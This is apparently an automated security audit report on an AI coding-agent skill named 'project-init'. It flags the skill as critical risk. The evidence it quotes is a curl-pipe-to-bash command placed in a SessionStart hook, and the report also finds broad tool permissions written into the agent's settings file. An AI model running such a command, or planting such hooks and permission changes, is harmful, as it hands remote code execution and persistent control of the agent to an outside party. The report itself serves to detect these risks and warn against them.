project-init
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICAL (REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION)
Full Analysis
- [REMOTE_CODE_EXECUTION] (CRITICAL): The script `scripts/setup-project.sh` defines a configuration hook that executes code from a remote URL by piping it directly into bash.
  - Evidence: The `NEW_HOOK` variable in `scripts/setup-project.sh` contains the command `curl -fsSL https://raw.githubusercontent.com/ArjenSchwarz/agentic-coding/main/scripts/claude-remote.sh | bash`.
- [EXTERNAL_DOWNLOADS] (HIGH): The skill downloads a script from an untrusted GitHub repository (`ArjenSchwarz/agentic-coding`) which is not on the approved trusted sources list.
- [COMMAND_EXECUTION] (HIGH): The skill grants broad, unverified execution permissions for a wide range of sensitive system tools (including `docker`, `terraform`, `make`, and various language compilers) by modifying the `.claude/settings.json` file.
- [PERSISTENCE MECHANISMS] (HIGH): By injecting the malicious command into the `SessionStart` hook of the Claude configuration, the skill ensures that the remote code is executed automatically every time the agent starts a new session in that directory.
- [INDIRECT PROMPT INJECTION] (MEDIUM): The skill modifies local configuration files (`.claude/settings.json`) which dictate the security boundaries and behavior of the agent in subsequent interactions, allowing an attacker-controlled script to define the agent's capabilities.
Recommendations
- CRITICAL: Downloads and executes remote code from untrusted source(s): https://raw.githubusercontent.com/ArjenSchwarz/agentic-coding/main/scripts/claude-remote.sh - DO NOT USE
- AI detected serious security threats
Audit Metadata